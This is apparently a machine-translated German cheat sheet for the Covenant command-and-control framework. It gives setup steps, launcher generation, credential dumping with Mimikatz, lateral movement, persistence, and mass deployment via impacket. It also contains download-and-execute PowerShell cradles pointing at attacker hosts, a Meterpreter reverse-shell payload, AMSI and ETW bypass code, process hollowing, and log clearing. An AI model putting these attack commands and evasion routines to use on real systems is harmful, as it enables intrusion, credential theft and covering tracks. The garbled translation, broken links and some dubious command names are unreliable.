Covening C2 Framework Cheat Sheet
Überblick
Covenant ist ein .NET-basiertes Kommando- und Steuerungs- (C2)-Framework, das für rote Teamoperationen und Penetrationstests konzipiert ist. Es verfügt über eine webbasierte Schnittstelle zur Teamkooperation, unterstützt mehrere Kommunikationsprotokolle und bietet umfangreiche Post-Exploitation-Funktionen, die speziell auf Windows-Umgebungen zugeschnitten sind. NET-Baugruppen.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Verwendung gegen jedes Ziel haben.
Installation
Voraussetzungen
```bash
Install .NET Core SDK (3.1 or later)
wget https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb sudo dpkg -i packages-microsoft-prod.deb sudo apt update sudo apt install -y dotnet-sdk-6.0
Verify installation
dotnet --version ```_
Docker Installation (empfohlen)
```bash
Clone Covenant repository
git clone --recurse-submodules https://github.com/cobbr/Covenant.git cd Covenant/Covenant
Build Docker image
docker build -t covenant .
Run Covenant container
docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant covenant
Access web interface
Navigate to https://localhost:7443
```_
Manuelle Installation
```bash
Clone repository
git clone --recurse-submodules https://github.com/cobbr/Covenant.git cd Covenant/Covenant
Build Covenant
dotnet build
Run Covenant
dotnet run
Access web interface at https://localhost:7443
```_
Kali Linux Installation
```bash
Install from Kali repositories
sudo apt update sudo apt install covenant
Or build from source
git clone https://github.com/cobbr/Covenant.git cd Covenant/Covenant dotnet build dotnet run ```_
Basisnutzung
Erster Setup
```bash
First-time setup
- Navigate to https://localhost:7443
- Create admin user account
- Accept SSL certificate warnings
- Complete initial configuration wizard
Default credentials (change immediately)
Username: CovenantAdmin Password: CovenantPassword ```_
Web Interface Navigation
| | Section | Description | | | --- | --- | | | Dashboard | Overview of active grunts and listeners | | | | Listeners | Manage communication listeners | | | | Grunts | Manage compromised hosts (agents) | | | | Tasks | Execute commands and modules | | | | Templates | Manage grunt templates and launchers | | | | Users | User management and permissions | | | | Data | Collected data and file downloads | |
Hörer Management
HTTP Listener erstellen
```bash
Web Interface Steps:
- Navigate to Listeners → Create
- Select HTTP Listener
- Configure parameters:
- Name: HTTP-Listener-80
- Bind Address: 0.0.0.0
- Bind Port: 80
- Connect Address: [Your IP]
- Connect Port: 80
- Use SSL: False
Advanced HTTP Configuration
- Profile: DefaultHttpProfile
- URLs: /en-us/index.html,/en-us/docs.html
- User Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) ```_
HTTPS Listener erstellen
```bash
HTTPS Listener Configuration:
- Navigate to Listeners → Create
- Select HTTP Listener
- Configure parameters:
- Name: HTTPS-Listener-443
- Bind Address: 0.0.0.0
- Bind Port: 443
- Connect Address: [Your IP]
- Connect Port: 443
- Use SSL: True
- SSL Certificate: [Upload or generate]
Generate SSL Certificate
openssl req -new -x509 -keyout covenant.key -out covenant.crt -days 365 -nodes ```_
Bridge Listener (SMB)
```bash
SMB Bridge Configuration:
- Navigate to Listeners → Create
- Select Bridge Listener
- Configure parameters:
- Name: SMB-Bridge
- Bind Address: 0.0.0.0
- Bind Port: 445
- Connect Address: [Target IP]
- Connect Port: 445
- Profile: SMBBridgeProfile ```_
Grunt Generation und Bereitstellung
Powershell Grunt
```powershell
Generate PowerShell launcher
- Navigate to Launchers → PowerShell
- Configure parameters:
- Listener: HTTP-Listener-80
- Delay: 5
- Jitter: 0.1
- Connect Attempts: 5000
- Kill Date: [Future date]
Generated PowerShell command example:
powershell -Sta -Nop -Window Hidden -EncodedCommand [Base64EncodedPayload]
Execute on target
powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://[IP]/launcher.ps1')" ```_
Binärrasen
```bash
Generate binary executable
- Navigate to Launchers → Binary
- Configure parameters:
- Listener: HTTPS-Listener-443
- Output Kind: ConsoleApplication
- Target Framework: net40
- Delay: 10
- Jitter: 0.2
Download and execute on target
Binary will be generated as .exe file
```_
MSBuild Grunt
```xml
- Navigate to Launchers → MSBuild
- Configure listener and parameters
- Generated MSBuild XML file:
<![CDATA[
// Covenant grunt code here
]]>
Execute with:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml ```_
InstallUtil Grunt
```bash
InstallUtil launcher
- Navigate to Launchers → InstallUtil
- Configure parameters
- Execute on target:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe ```_
Grunt Management
Über uns
```bash
Basic grunt commands
help # Show available commands whoami # Get current user context hostname # Get computer name pwd # Get current directory ls # List directory contents cd [directory] # Change directory cat [file] # Read file contents download [file] # Download file from target upload [local] [remote] # Upload file to target ```_
Prozessmanagement
```bash
Process operations
ps # List running processes kill [PID] # Terminate process getpid # Get current process ID ppid # Get parent process ID
Process injection
inject [PID] [assembly] # Inject .NET assembly into process shinject [PID] [shellcode] # Inject shellcode into process ```_
Einrichtende Operationen
```bash
Credential harvesting
mimikatz # Execute Mimikatz logonpasswords # Dump logon passwords lsadump # Dump LSA secrets dcsync [domain] [user] # DCSync attack golden [options] # Golden ticket creation
Token manipulation
steal_token [PID] # Steal process token make_token [user] [pass] # Create new token rev2self # Revert to original token ```_
Spätere Bewegung
```bash
WMI execution
wmi [computer] [command] # Execute command via WMI wmiexec [computer] [user] [pass] [command] # WMI with credentials
PowerShell remoting
winrm [computer] [command] # Execute via WinRM invoke-command [computer] [scriptblock] # PowerShell remoting
Service creation
sc [computer] [service] [binary] # Create and start service ```_
Erweiterte Module
Persistenzmechanismen
```bash
Registry persistence
persist_registry [key] [value] [payload] # Registry autorun
Scheduled task persistence
persist_schtask [name] [trigger] [payload] # Scheduled task
Service persistence
persist_service [name] [payload] # Windows service
WMI persistence
persist_wmi [filter] [consumer] [payload] # WMI event subscription ```_
Vorrechte Eskalation
```bash
UAC bypass techniques
bypassuac [method] # Various UAC bypass methods eventvwr # Event Viewer UAC bypass fodhelper # FodHelper UAC bypass computerdefaults # Computer Defaults UAC bypass
Kernel exploits
ms16-032 # Secondary Logon Handle Privilege Escalation ms16-135 # Windows Kernel-Mode Drivers EoP ```_
Datenerhebung
```bash
System information
sysinfo # Detailed system information env # Environment variables netstat # Network connections arp # ARP table route # Routing table
File system operations
find [pattern] # Search for files tree [directory] # Directory tree drives # List available drives ```_
Netzwerkaktivitäten
```bash
Port scanning
portscan [target] [ports] # TCP port scan ping [target] # ICMP ping nslookup [hostname] # DNS lookup
Network shares
net share # List local shares net use # List network connections net view [computer] # List remote shares ```_
Team Collaboration
Benutzermanagement
```bash
Web Interface User Operations:
- Navigate to Users section
- Create new user accounts
- Assign roles and permissions:
- Administrator: Full access
- User: Limited access
- Listener: Listener management only ```_
Datenaustausch
```bash
File management
- Navigate to Data → Files
- View downloaded files from all grunts
- Share files between team members
- Export data for analysis
Credential sharing
- Navigate to Data → Credentials
- View harvested credentials
- Export credential database ```_
Berichterstattung
```bash
Generate reports
- Navigate to Data → Events
- Filter by time range and grunt
- Export activity logs
- Generate executive summary ```_
Automatisierung und Schrift
Grunt Automation Script
```csharp // C# automation script for Covenant using System; using System.Threading.Tasks; using Covenant.Models;
public class AutomationScript \\{ public async Task ExecuteAutomation(Grunt grunt) \\{ // Automated reconnaissance await grunt.ExecuteTask("whoami"); await grunt.ExecuteTask("hostname"); await grunt.ExecuteTask("sysinfo"); await grunt.ExecuteTask("ps");
// Credential harvesting
if (grunt.Integrity == "High")
\\\\{
await grunt.ExecuteTask("mimikatz");
await grunt.ExecuteTask("logonpasswords");
\\\\}
// Network discovery
await grunt.ExecuteTask("netstat");
await grunt.ExecuteTask("arp");
await grunt.ExecuteTask("net view");
// Persistence
await grunt.ExecuteTask("persist_registry HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Update payload.exe");
\\\\}
\\} ```_
PowerShell Automation
```powershell
PowerShell script for automated grunt management
function Invoke-CovenantAutomation \\{ param( [string]$CovenantURL = "https://localhost:7443", [string]$Username, [string]$Password )
# Authenticate to Covenant API
$auth = @\\\\{
UserName = $Username
Password = $Password
\\\\}
$session = Invoke-RestMethod -Uri "$CovenantURL/api/users/login" -Method POST -Body ($auth|ConvertTo-Json) -ContentType "application/json"
# Get active grunts
$grunts = Invoke-RestMethod -Uri "$CovenantURL/api/grunts" -Headers @\\\\{Authorization = "Bearer $($session.token)"\\\\}
foreach ($grunt in $grunts) \\\\{
if ($grunt.Status -eq "Active") \\\\{
Write-Host "Processing grunt: $($grunt.Name)"
# Execute reconnaissance commands
$commands = @("whoami", "hostname", "sysinfo", "ps")
foreach ($cmd in $commands) \\\\{
$task = @\\\\{
Type = "GruntTask"
GruntId = $grunt.Id
Command = $cmd
\\\\}
Invoke-RestMethod -Uri "$CovenantURL/api/grunttasks" -Method POST -Body ($task|ConvertTo-Json) -ContentType "application/json" -Headers @\\\\{Authorization = "Bearer $($session.token)"\\\\}
Start-Sleep -Seconds 2
\\\\}
\\\\}
\\\\}
\\}
Usage
Invoke-CovenantAutomation -Username "admin" -Password "password" ```_
Batch Grunt Einsatz
```bash
!/bin/bash
Batch grunt deployment script
COVENANT_URL="https://your-covenant-server:7443" TARGETS_FILE="targets.txt"
Generate PowerShell launcher
LAUNCHER=$(curl -s -k -X GET "$COVENANT_URL/api/launchers/powershell/1" -H "Authorization: Bearer $TOKEN"|jq -r '.LauncherString')
Deploy to multiple targets
while read -r target; do echo "[+] Deploying to $target"
# Method 1: WMI execution
impacket-wmiexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "powershell -exec bypass -c \"$LAUNCHER\""
# Method 2: PSExec
impacket-psexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "powershell -exec bypass -c \"$LAUNCHER\""
# Method 3: SMB + scheduled task
impacket-smbexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "schtasks /create /tn Update /tr \"powershell -exec bypass -c \\\"$LAUNCHER\\\"\" /sc once /st 00:00"
sleep 5
done < "$TARGETS_FILE" ```_
Evasion Techniken
AMSI Bypass
```csharp // AMSI bypass in Covenant grunt [System.Diagnostics.CodeAnalysis.SuppressMessage("Microsoft.Usage", "CA2201:DoNotRaiseReservedExceptionTypes")] public static void BypassAMSI() \\{ try \\{ var amsiContext = Marshal.AllocHGlobal(9076); var amsiSession = Marshal.AllocHGlobal(9076); var amsiScanBuffer = Marshal.AllocHGlobal(9076);
// AMSI bypass implementation
var amsiDll = LoadLibrary("amsi.dll");
var amsiScanBufferAddr = GetProcAddress(amsiDll, "AmsiScanBuffer");
var patch = new byte[] \\\\{ 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 \\\\};
var oldProtect = VirtualProtect(amsiScanBufferAddr, (UIntPtr)patch.Length, 0x40, out uint _);
Marshal.Copy(patch, 0, amsiScanBufferAddr, patch.Length);
VirtualProtect(amsiScanBufferAddr, (UIntPtr)patch.Length, oldProtect, out uint _);
\\\\}
catch \\\\{ \\\\}
\\} ```_
ETW Bypass
```csharp // ETW bypass implementation public static void BypassETW() \\{ try \\{ var ntdll = LoadLibrary("ntdll.dll"); var etwEventWrite = GetProcAddress(ntdll, "EtwEventWrite");
var patch = new byte[] \\\\{ 0xC3 \\\\}; // ret instruction
var oldProtect = VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, 0x40, out uint _);
Marshal.Copy(patch, 0, etwEventWrite, patch.Length);
VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, oldProtect, out uint _);
\\\\}
catch \\\\{ \\\\}
\\} ```_
Prozess-Hollowing
```csharp // Process hollowing implementation public static void ProcessHollow(string targetProcess, byte[] payload) \\{ var startupInfo = new STARTUPINFO(); var processInfo = new PROCESS_INFORMATION();
// Create suspended process
CreateProcess(null, targetProcess, IntPtr.Zero, IntPtr.Zero, false,
ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null,
ref startupInfo, out processInfo);
// Unmap original image
ZwUnmapViewOfSection(processInfo.hProcess, GetImageBase(processInfo.hProcess));
// Allocate memory and write payload
var baseAddress = VirtualAllocEx(processInfo.hProcess, GetImageBase(processInfo.hProcess),
payload.Length, AllocationType.Commit|AllocationType.Reserve,
MemoryProtection.ExecuteReadWrite);
WriteProcessMemory(processInfo.hProcess, baseAddress, payload, payload.Length, out _);
// Resume execution
ResumeThread(processInfo.hThread);
\\} ```_
Integration mit anderen Tools
Metasploit Integration
```bash
Use Covenant with Metasploit
Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f exe -o meterpreter.exe
Upload via Covenant grunt
upload meterpreter.exe C:\Windows\Temp\update.exe
Execute Metasploit payload
execute C:\Windows\Temp\update.exe
Use Metasploit for post-exploitation
msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set LHOST 192.168.1.100 set LPORT 443 run ```_
BlutHound Integration
```bash
Collect BloodHound data via Covenant
Upload SharpHound to target
upload SharpHound.exe C:\Windows\Temp\collector.exe
Run BloodHound collection
execute C:\Windows\Temp\collector.exe -c All -d domain.local
Download collected data
download C:\Windows\Temp*BloodHound.zip
Import into BloodHound
neo4j start ./BloodHound --no-sandbox
Import downloaded zip file
```_
CrackMapExec Integration
```bash
Use CME for initial access, Covenant for persistence
Initial compromise via CME
crackmapexec smb 192.168.1.0/24 -u username -p password --exec-method wmiexec -x "powershell -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/launcher.ps1')\""
Verify Covenant grunt connection
Use Covenant for further exploitation
```_
Operationelle Sicherheit
Kommunikationssicherheit
```bash
Use domain fronting
- Configure CloudFlare or similar CDN
- Set up domain fronting rules
- Configure Covenant listener with fronted domain
- Use legitimate-looking URLs and user agents
Certificate management
Use legitimate SSL certificates
certbot certonly --standalone -d your-domain.com
Configure Covenant with legitimate certificate
```_
Verkehrsobfukation
```bash
Custom HTTP profiles
- Navigate to Profiles → HTTP
- Create custom profile mimicking legitimate traffic:
- User agents from target environment
- URLs matching legitimate applications
- Headers matching expected traffic
Malleable C2 profiles
Create custom communication patterns
Mimic legitimate applications (Office 365, Google, etc.)
```_
Anti-Forensik
```bash
Event log clearing
wevtutil cl System wevtutil cl Security wevtutil cl Application
Timestomping
timestomp C:\Windows\Temp\payload.exe -f C:\Windows\System32\notepad.exe
Memory cleanup
Implement memory wiping in custom tasks
Use process migration to avoid memory analysis
```_
Fehlerbehebung
Gemeinsame Themen
```bash
Grunt not connecting
- Check firewall rules on Covenant server
- Verify listener configuration
- Test network connectivity
- Check antivirus interference
SSL certificate issues
Generate new certificate
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
Performance issues
Increase grunt delay and jitter
Use multiple listeners for load balancing
Optimize task execution frequency
```_
Debug Mode
```bash
Enable debug logging
- Navigate to Administration → Settings
- Enable debug logging
- Check logs in Data → Events
- Monitor grunt communication
Network troubleshooting
Use Wireshark to analyze traffic
Check for network filtering
Verify DNS resolution
```_
Datenbankprobleme
```bash
Reset Covenant database
cd Covenant/Covenant rm -rf Data/covenant.db dotnet run
Backup database
cp Data/covenant.db Data/covenant.db.backup
Restore database
cp Data/covenant.db.backup Data/covenant.db ```_
Best Practices
Betriebsplanung
- ** Voreinstellung**: Hörer und Profile vor dem Eingriff konfigurieren
- Teamkoordination: Rollenbasierte Zugriffskontrolle für Teammitglieder
- ** Kommunikationsprotokolle*: klare Kommunikationskanäle einrichten
- Datenhandling: Implementierung sicherer Datenerfassungs- und Speicherverfahren
- *Cleanup-Verfahren: Plan zur Entfernung von Artefakten und Reinigung
Sicherheitsüberlegungen
```bash
Secure Covenant deployment
Use strong authentication
Enable HTTPS with valid certificates
Implement network segmentation
Regular security updates
Grunt management
Use unique grunt names
Implement kill dates
Regular grunt rotation
Secure communication channels
```_
Dokumentation
```bash
Maintain operation logs
Document all activities
Track compromised systems
Record credential harvesting
Generate executive reports
```_
Ressourcen
- [Covenant GitHub Repository](__LINK_5___ -%20Covenant%20Documentation
- SpecterOps Blog Posts
- [Red Team Village Covenant Training](LINK_5___ -%20(SANS%20Red%20Team%20Operations)(__LINK_5)
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Covenant C2 Framework. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Durchführung von roten Team-Operationen oder Penetrationstests haben. *